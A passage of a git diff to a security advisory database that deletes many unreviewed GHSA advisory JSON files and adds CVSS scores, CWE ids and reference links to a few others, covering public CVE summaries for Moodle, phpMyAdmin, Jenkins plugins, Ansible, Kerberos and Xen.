"2022-05-13T01:12:43Z", - "published": "2022-05-13T01:12:43Z", - "aliases": [ - "CVE-2015-0218" - ], - "details": "Cross-site request forgery (CSRF) vulnerability in auth/shibboleth/logout.php in Moodle through 2.5.9, 2.6.x before 2.6.7, 2.7.x before 2.7.4, and 2.8.x before 2.8.2 allows remote attackers to hijack the authentication of arbitrary users for requests that trigger a logout.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0218" - }, - { - "type": "WEB", - "url": "https://moodle.org/mod/forum/discuss.php?d=278618" - }, - { - "type": "WEB", - "url": "http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-47964" - }, - { - "type": "WEB", - "url": "http://openwall.com/lists/oss-security/2015/01/19/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2015-06-01T19:59:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json b/advisories/unreviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json deleted file mode 100644 index 47633ac1e7eae..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5pjj-7m4p-wfh2", - "modified": "2022-05-17T02:04:28Z", - "published": "2022-05-17T02:04:28Z", - "aliases": [ - "CVE-2010-4338" - ], - "details": "ocrodjvu 0.4.6-1 on Debian GNU/Linux allows local users to modify arbitrary files via a symlink attack on temporary files that are generated when Cuneiform is invoked as the OCR engine.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4338" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64892" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598134" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45234" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-59" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2011-01-20T19:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json b/advisories/unreviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json deleted file mode 100644 index cbb933651716f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json +++ /dev/null @@ -1,107 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5pvv-f8h3-gw96", - "modified": "2022-05-02T03:47:43Z", - "published": "2022-05-02T03:47:43Z", - "aliases": [ - "CVE-2009-3696" - ], - "details": "Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3696" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=528769" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53742" - }, - { - "type": "WEB", - "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00467.html" - }, - { - "type": "WEB", - "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00490.html" - }, - { - "type": "WEB", - "url": "http://bugs.gentoo.org/show_bug.cgi?id=288899" - }, - { - "type": "WEB", - "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/2.11.9.6/phpMyAdmin-2.11.9.6-notes.html" - }, - { - "type": "WEB", - "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.2.2.1/phpMyAdmin-3.2.2.1-notes.html" - }, - { - "type": "WEB", - "url": "http://freshmeat.net/projects/phpmyadmin/releases/306667" - }, - { - "type": "WEB", - "url": "http://freshmeat.net/projects/phpmyadmin/releases/306669" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125553728512853&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125561979001460&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37016" - }, - { - "type": "WEB", - "url": "http://typo3.org/extensions/repository/view/phpmyadmin/4.5.0/" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-015/" - }, - { - "type": "WEB", - "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:274" - }, - { - "type": "WEB", - "url": "http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36658" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/2899" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-10-16T16:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json b/advisories/unreviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json deleted file mode 100644 index d3759e2911525..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5q7j-8hpc-4848", - "modified": "2022-05-14T01:38:17Z", - "published": "2022-05-14T01:38:17Z", - "aliases": [ - "CVE-2018-1000421" - ], - "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to initiate a test connection to an attacker-specified Mesos server with attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000421" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(2)" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json b/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json index eaf8e72370969..43a9a21884a93 100644 --- a/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json +++ b/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json b/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json index fe050725006d7..ef009983cc273 100644 --- a/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json +++ b/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5rjh-29pm-3mx4", - "modified": "2022-05-24T19:21:18Z", + "modified": "2024-02-04T09:30:31Z", "published": "2022-05-24T19:21:18Z", "aliases": [ "CVE-2021-28709" ], "details": "issues with partially successful P2M updates on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). In some cases the hypervisor carries out the requests by splitting them into smaller chunks. Error handling in certain PoD cases has been insufficient in that in particular partial success of some operations was not properly accounted for. There are two code paths affected - page removal (CVE-2021-28705) and insertion of new pages (CVE-2021-28709). (We provide one patch which combines the fix to both issues.)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28709" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -26,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json b/advisories/unreviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json deleted file mode 100644 index 7e10f85e7aea2..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5v2j-w677-j4mp", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003027" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins OctopusDeploy Plugin 1.8.1 and earlier in OctopusDeployPlugin.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified URL and obtain the HTTP response code if successful, and exception error message otherwise.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003027" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-817" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107295" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-20T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json b/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json index 30bb9dbba5908..8ec48c5fd2861 100644 --- a/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json +++ b/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6243-f9c4-77f4", - "modified": "2022-05-02T06:14:16Z", + "modified": "2024-02-02T18:30:21Z", "published": "2022-05-02T06:14:16Z", "aliases": [ "CVE-2010-0629" ], "details": "Use-after-free vulnerability in kadmin/server/server_stubs.c in kadmind in MIT Kerberos 5 (aka krb5) 1.5 through 1.6.3 allows remote authenticated users to cause a denial of service (daemon crash) via a request from a kadmin client that sends an invalid API version number.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -97,7 +100,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json b/advisories/unreviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json deleted file mode 100644 index 8e73006e7019f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-63cj-3r94-234v", - "modified": "2022-05-17T00:29:01Z", - "published": "2022-05-17T00:29:01Z", - "aliases": [ - "CVE-2017-1000103" - ], - "details": "The custom Details view of the Static Analysis Utilities based DRY Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000103" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/101061" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json b/advisories/unreviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json deleted file mode 100644 index 318f82531ce2a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-64cw-m57j-65xj", - "modified": "2022-05-17T19:57:30Z", - "published": "2022-05-17T19:57:30Z", - "aliases": [ - "CVE-2014-4967" - ], - "details": "Multiple argument injection vulnerabilities in Ansible before 1.6.7 allow remote attackers to execute arbitrary code by leveraging access to an Ansible managed host and providing a crafted fact, as demonstrated by a fact with (1) a trailing \" src=\" clause, (2) a trailing \" temp=\" clause, or (3) a trailing \" validate=\" clause accompanied by a shell command.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4967" - }, - { - "type": "WEB", - "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" - }, - { - "type": "WEB", - "url": "http://www.ocert.org/advisories/ocert-2014-004.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-18T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json b/advisories/unreviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json deleted file mode 100644 index e9d0470e04abf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-65cq-whr4-7c2v", - "modified": "2022-05-17T00:32:26Z", - "published": "2022-05-17T00:32:26Z", - "aliases": [ - "CVE-2017-1000109" - ], - "details": "The custom Details view of the Static Analysis Utilities based OWASP Dependency-Check Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000109" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/100227" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json b/advisories/unreviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json deleted file mode 100644 index ee1d378296ed2..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-65rj-cgrp-g65w", - "modified": "2023-10-25T18:31:25Z", - "published": "2022-05-24T16:55:01Z", - "aliases": [ - "CVE-2019-10391" - ], - "details": "Jenkins IBM Application Security on Cloud Plugin 1.2.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10391" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-28/#SECURITY-1512" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/28/4" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-28T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json b/advisories/unreviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json deleted file mode 100644 index 7d3059cb27634..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6667-f46p-pg88", - "modified": "2022-05-17T19:57:32Z", - "published": "2022-05-17T19:57:32Z", - "aliases": [ - "CVE-2014-4659" - ], - "details": "Ansible before 1.5.5 sets 0644 permissions for sources.list, which might allow local users to obtain sensitive credential information in opportunistic circumstances by reading a file that uses the "deb http://user:pass@server:port/" format.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4659" - }, - { - "type": "WEB", - "url": "https://github.com/ansible/ansible/blob/release1.5.5/CHANGELOG.md" - }, - { - "type": "WEB", - "url": "https://www.securityfocus.com/bid/68234" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-20T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json b/advisories/unreviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json deleted file mode 100644 index c867901448fe6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-687x-269m-7cv9", - "modified": "2022-05-14T03:46:09Z", - "published": "2022-05-14T03:46:09Z", - "aliases": [ - "CVE-2018-1000008" - ], - "details": "Jenkins PMD Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000008" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/102844" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json b/advisories/unreviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json deleted file mode 100644 index 4e73d132fffa6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6h72-m3xw-fp3c", - "modified": "2022-05-13T01:40:56Z", - "published": "2022-05-13T01:40:56Z", - "aliases": [ - "CVE-2017-1000104" - ], - "details": "The Config File Provider Plugin is used to centrally manage configuration files that often include secrets, such as passwords. Users with only Overall/Read access to Jenkins were able to access URLs directly that allowed viewing these files. Access to view these files now requires sufficient permissions to configure the provided files, view the configuration of the folder in which the configuration files are defined, or have Job/Configure permissions to a job able to use these files.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000104" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-269" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json b/advisories/unreviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json deleted file mode 100644 index 6707054bd7daf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6j5j-w6v4-rwqr", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003078" - ], - "details": "A cross-site request forgery vulnerability in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003078" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json b/advisories/unreviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json deleted file mode 100644 index 0fe26a14f940a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6m9f-8vwq-97pm", - "modified": "2022-05-02T04:00:47Z", - "published": "2022-05-02T04:00:47Z", - "aliases": [ - "CVE-2009-5054" - ], - "details": "Smarty before 3.0.0 beta 4 does not consider the umask value when setting the permissions of files, which might allow attackers to bypass intended access restrictions via standard filesystem operations.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-5054" - }, - { - "type": "WEB", - "url": "http://smarty-php.googlecode.com/svn/trunk/distribution/change_log.txt" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2011-02-03T17:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json b/advisories/unreviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json deleted file mode 100644 index 8488a96992978..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6mgq-vh7r-gccc", - "modified": "2022-05-13T01:25:42Z", - "published": "2022-05-13T01:25:42Z", - "aliases": [ - "CVE-2019-1003086" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003086" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json b/advisories/unreviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json deleted file mode 100644 index 2254975d5bed4..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6pj9-5q6j-j97c", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003083" - ], - "details": "A missing permission check in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003083" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json 